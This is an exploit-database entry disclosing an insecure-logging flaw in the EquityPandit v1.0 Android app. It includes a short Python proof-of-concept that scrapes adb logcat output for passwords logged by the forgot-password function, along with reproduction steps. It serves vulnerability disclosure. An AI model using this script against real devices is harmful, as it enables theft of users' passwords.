header-logo
Suggest Exploit
vendor:
EquityPandit
by:
ManhNho
6.5
CVSS
MEDIUM
Insecure Logging
N/A
CWE
Product Name: EquityPandit
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:yieldnotion:equitypandit
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Android
2019

EquityPandit v1.0 – Insecure Logging

Sometimes developers keeps sensitive data logged into the developer console. Thus, attacker easy to capture sensitive information like password. In this application, with adb, attacker can capture password of any users via forgot password function.

Mitigation:

Developers should not keep sensitive data logged into the developer console.
Source

Exploit-DB raw data:

#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

   - Sometimes developers keeps sensitive data logged into the developer
   console. Thus, attacker easy to capture sensitive information like password.
   - In this application, with adb, attacker can capture password of any
   users via forgot password function.

#Requirement:

   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: victim@abc.com/123456
   - Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
	print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


   - Step 2: From Android machine, open EquityPandit, click forgot password
   function for acccount "victim@abc.com" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: Password of "victim@abc.com" will be show in terminal as
   "123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

Navigation

Suggest Exploit

Services By CQR